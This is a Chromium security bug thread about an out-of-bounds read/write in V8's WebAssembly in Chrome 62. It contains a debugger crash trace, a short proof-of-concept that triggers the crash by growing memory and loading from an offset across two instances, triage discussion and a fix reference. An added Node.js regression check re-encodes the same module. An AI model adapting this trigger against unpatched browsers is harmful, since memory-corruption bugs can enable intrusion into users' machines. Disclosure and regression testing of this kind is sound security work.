Security:V8:OOB Read Write In WebAssembly
Reported by
soulchen...@gmail.com,
Nov 7 2017
Issue description
VULNERABILITY DETAILS
This is an OOB read/write problem in V8:WebAssembly. It will cause the JIT code base address to be multiplied by 2. It causes a security problem.
VERSION
Chrome Version: 62.0.3202.89 Stable
Operating System: Windows 10 1703 64bit
REPRODUCTION CASE
In the zip file |ppoc.zip|, the password is: dabaodabao
0:014> g
(1b84.acc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
1a206639 8b0401 mov eax,dword ptr [ecx+eax] ds:002b:86c092f0=????????
0:000:x86> bt
^ Operation not supported in current debug session 'bt'
0:000:x86> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0073ea34 1a2066cd 0000034e 258e3af5 258ec389 0x1a206639
0073eadc 652fbdc8 1bb8417d 258e3ad1 0b410535 0x1a2066cd
0073eb5c 652fbcd8 00000000 0521a418 0521a510 chrome_child!ovly_debug_event+0x43ac8
0073eb90 65258eae 0521a418 0521a510 00000000 chrome_child!ovly_debug_event+0x439d8
0073ec20 6549c407 0073ec94 0521a508 28f221d8 chrome_child+0xd8eae
0073ecd8 6549c2e7 0521a418 28f221d8 516411c0 chrome_child!ovly_debug_event+0x1e4107
0073ed30 6549c1e2 0073ed58 0521a3e8 2b043ac4 chrome_child!ovly_debug_event+0x1e3fe7
0073ed80 6549d077 0073edb4 2b043ac4 00000001 chrome_child!ovly_debug_event+0x1e3ee2
0073eda8 6549d043 2b043ac4 00000001 0073edf4 chrome_child!ovly_debug_event+0x1e4d77
0073edb8 6552a2f9 4c021b98 51684190 3f5aa160 chrome_child!ovly_debug_event+0x1e4d43
0073edf4 6552a113 00000000 3f5aa160 00000000 chrome_child!ChromeMain+0xb823
0073ee20 6534067d 2b043a70 0073ee98 3f5aa160 chrome_child!ChromeMain+0xb63d
0073efa0 6552e6d7 0073f0b0 28f22158 349f408c chrome_child!ovly_debug_event+0x8837d
0073f080 6552e56c 28f22a88 0073f0b0 4c028a90 chrome_child!ChromeMain+0xfc01
0073f098 6552e542 28f22a58 0073f0b0 4c028a90 chrome_child!ChromeMain+0xfa96
0073f0b8 6538231c 00000000 4c028a90 4c028ca8 chrome_child!ChromeMain+0xfa6c
0073f114 653cf680 00000000 0073f19c 08196d08 chrome_child!ovly_debug_event+0xca01c
0073f16c 6547a178 08196d08 081885b8 6547a15e chrome_child!ovly_debug_event+0x117380
0073f19c 652b5545 08188598 00000000 652b54e4 chrome_child!ovly_debug_event+0x1c1e78
0073f2b0 652ab287 674ead0c 0073f2e0 0073f430 chrome_child+0x135545
0073f40c 652b69d3 10ddbdfa 00000092 0073f448 chrome_child+0x12b287
0073f4d8 6538f224 00000000 052d5ea0 00000000 chrome_child+0x1369d3
0073f4ec 652b5545 052d5ea0 00000000 652b54e4 chrome_child!ovly_debug_event+0xd6f24
0073f600 652ab9f2 6754f5f4 0073f6f8 0519f058 chrome_child+0x135545
0073f67c 652b5a12 0073f6f8 051a02d8 0519f018 chrome_child+0x12b9f2
0073f740 652ba344 67a55c54 674f0ad0 00000000 chrome_child+0x135a12
0073f794 65448740 0519f018 0073f860 654486f7 chrome_child!ovly_debug_event+0x2044
0073f828 65532a60 0073f948 00000003 0073f95c chrome_child!ovly_debug_event+0x190440
0073f90c 65520ae5 0073f948 052d6290 0519ba78 chrome_child!ChromeMain+0x13f8a
0073f924 65520992 0073fa84 00000003 0073fa2c chrome_child!ChromeMain+0x200f
0073f978 6551ef96 0073fa48 0073fa84 6751a724 chrome_child!ChromeMain+0x1ebc
0073fa18 6551ec43 0073fad8 00900000 00000000 chrome_child!ChromeMain+0x4c0
0073fa50 6551ebdc 04bba090 00000008 00000007 chrome_child!ChromeMain+0x16d
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\BoA\Desktop\Chrome\Application\chrome.exe -
0073fab0 00905a2f 00900000 0073fad8 10dc63d1 chrome_child!ChromeMain+0x106
0073fb5c 00902213 00900000 10dc63d1 00000092 chrome+0x5a2f
0073fc9c 009a0da8 00900000 00000000 007b1da4 chrome+0x2213
*** ERROR: Symbol file could not be found. Defaulted to export symbols for KERNEL32.dll -
0073fce8 76b18744 00523000 76b18720 4be628e5 chrome!IsSandboxedProcess+0x43478
0073fcfc 7713582d 00523000 16274235 00000000 KERNEL32!BaseThreadInitThunk+0x24
0073fd44 771357fd ffffffff 7715636e 00000000 ntdll_770d0000!RtlGetAppContainerNamedObjectPath+0xfd
0073fd54 00000000 009a0e20 00523000 00000000 ntdll_770d0000!RtlGetAppContainerNamedObjectPath+0xcd
Nov 8 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5458374069321728.
Nov 8 2017
Clusterfuzz can't reproduce. mstarzinger could you please help try to reproduce/triage? Thanks!
Nov 9 2017
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=4897656852971520.
Nov 9 2017
Note that the PoC file says "// Flags: --expose-wasm". So, lack of that flag might be why CF couldn't reproduce the problem. I'm trying a fresh testcase. Security_Impact-None for that reason (WASM is not on by default in production builds yet). If reproducible, severity will perhaps be High, though.
Nov 9 2017
Actually, yes, WASM is on by default.
Nov 9 2017
#5 This PoC can be reproduced with the latest Chrome stable version (62.0.3202.89 Stable). You can open the html file directly with default settings, and the render process will crash.
Nov 9 2017
Actually, you only need to focus on the following code in the PoC:
    var builder = new WasmModuleBuilder();    // helper from V8's test/mjsunit/wasm/wasm-module-builder.js
    builder.addMemory(0, 333);                // memory: min 0 pages, max 333 pages
    builder.addFunction('evil', kSig_i_v)     // signature: () -> i32
        .addBody([
            kExprI32Const, 0x3f,              // push 63
            kExprGrowMemory, 0x00,            // grow memory by 63 pages; pushes the old size (0)
            kExprI32LoadMem, 0x00, 0xf0, 0x25, // i32.load, align=0, offset=0x12f0 (LEB128 bytes f0 25)
        ])
        .exportFunc();
    var module = new WebAssembly.Module(builder.toBuffer());
    var i1 = new WebAssembly.Instance(module);
    try { i1.exports.evil(); } catch (e) {}   // first instance grows its memory and loads
    var i2 = new WebAssembly.Instance(module);
    alert("1");
    i2.exports.evil();                        // second instance of the same compiled module crashes
The other JS code belongs to V8's wasm test library JS code.
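As an added regression check (not part of the bug thread, and not V8's or the reporter's code), the following Node.js snippet hand-encodes the PoC's module bytes instead of relying on V8's WasmModuleBuilder test helper, then confirms that two instances of the same compiled module, like i1 and i2 above, each get a fresh 63-page memory after the grow and that loads past its end trap. The 'probe' and 'mem' exports are my additions and are assumed names.

```javascript
// Added regression check, not code from the bug thread: hand-encodes the PoC's
// module (memory min 0 / max 333, memory.grow(63), i32.load offset 0x12f0) and
// checks that two instances of the same compiled module each get their own,
// bounds-checked memory. Runs under Node.js; 'probe' and 'mem' exports are mine.
const PAGE = 65536;
const GROW_PAGES = 0x3f;          // i32.const 0x3f in the PoC (fits in one LEB byte)
const LOAD_OFFSET = 0x12f0;       // the PoC's offset bytes f0 25, LEB128-decoded
function uleb(n) {                // unsigned LEB128 encoding
  const out = [];
  do { let b = n & 0x7f; n >>>= 7; if (n) b |= 0x80; out.push(b); } while (n);
  return out;
}
const section = (id, payload) => [id, ...uleb(payload.length), ...payload];
const str = (s) => { const b = [...new TextEncoder().encode(s)]; return [...uleb(b.length), ...b]; };

function buildModule() {
  const types = [0x60, 0x00, 0x01, 0x7f,        // type 0: () -> i32
                 0x60, 0x01, 0x7f, 0x01, 0x7f]; // type 1: (i32) -> i32
  const evil = [0x00,                            // no locals
    0x41, GROW_PAGES,                            // i32.const 63
    0x40, 0x00,                                  // memory.grow; pushes old size (0)
    0x28, 0x00, ...uleb(LOAD_OFFSET),            // i32.load align=0 offset=0x12f0
    0x0b];                                       // end
  const probe = [0x00, 0x20, 0x00, 0x28, 0x00, 0x00, 0x0b]; // local.get 0; i32.load; end
  const bytes = [0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,  // magic + version
    ...section(1, [2, ...types]),
    ...section(3, [2, 0x00, 0x01]),                           // evil: type 0, probe: type 1
    ...section(5, [1, 0x01, 0x00, ...uleb(333)]),             // memory: min 0, max 333 pages
    ...section(7, [3, ...str('evil'), 0x00, 0x00, ...str('probe'), 0x00, 0x01,
                      ...str('mem'), 0x02, 0x00]),            // also export the memory
    ...section(10, [2, ...uleb(evil.length), ...evil, ...uleb(probe.length), ...probe])];
  return new WebAssembly.Module(new Uint8Array(bytes));
}

function checkInstance(inst) {
  const { evil, probe, mem } = inst.exports;
  const loaded = evil();                        // grow 0 -> 63 pages, then load at 0x12f0
  const pages = mem.buffer.byteLength / PAGE;   // buffer re-exposed after the grow
  const lastInBounds = probe(GROW_PAGES * PAGE - 4);   // last fully in-bounds i32
  let oobTrapped = false;
  try { probe(GROW_PAGES * PAGE - 3); }         // straddles the end of memory
  catch (e) { oobTrapped = e instanceof WebAssembly.RuntimeError; }
  return { loaded, pages, lastInBounds, oobTrapped };
}
// Same compiled module, two instances, like i1/i2 in the PoC; the report says
// the second one crashed in Chrome 62 after the first had grown its memory.
function checkTwoInstances() {
  const module = buildModule();
  return [new WebAssembly.Instance(module), new WebAssembly.Instance(module)].map(checkInstance);
}
```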
Nov 9 2017
I also cannot reproduce. The meat of this is:
    .addBody([
        kExprI32Const, 0x3f,
        kExprGrowMemory, 0x00,
        kExprI32LoadMem, 0x00, 0xf0, 0x25,
Which doesn't really have anything out of the ordinary.
Nov 9 2017
If you open the html file with the latest Chrome stable version, can you get this crash?
Nov 9 2017
Ah, this crashes in Chrome but not in the latest d8. Assigning to ahaas@ to take a look, as I am not sure if this is before we moved to use the WasmContext. Deepti, can you also take a look?
Nov 9 2017
This was actually fixed in 327df0b8c2831ae60ce492221754bba7b54de492 (https://crrev.com/c/674707) according to local bisect. The fix was not merged back to 62, but it will be contained in 63.
Nov 9 2017
I think we should merge this back to 62. I am wondering though why the impact on 62 was not identified in https://bugs.chromium.org/p/chromium/issues/detail?id=763439&can=2&q=763439 already?
Nov 9 2017
Could you help to assign a CVE to this issue? Because you haven't merged and fixed this in the M62 stable version now, and you considered this a "Null-dereference READ" problem, not a security problem, before I reported it to you. You probably didn't identify the impact on the 62 stable version and will not fix this if I don't report it to you. Thanks
Nov 9 2017
Assigning a CVE will encourage us to report the problem to you immediately if we encounter a similar situation in the future.
Nov 10 2017
Hi soulchen8650@ - thanks for the report, and for pointing out that this also affected 62. I'm afraid, however, that since this was indeed a duplicate submission, it doesn't qualify for a CVE allocation. By the way, did you find this by fuzzing? If so, then check out the Chrome Fuzzer Program at g.co/ChromeBugRewards. If you submit your fuzzer to us, we will run it at scale and automatically consider any security bugs it finds for both CVE allocation and VRP payment (which would include a $500 bonus for just being part of the program). Let me know if you'd like more details.
Feb 15 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot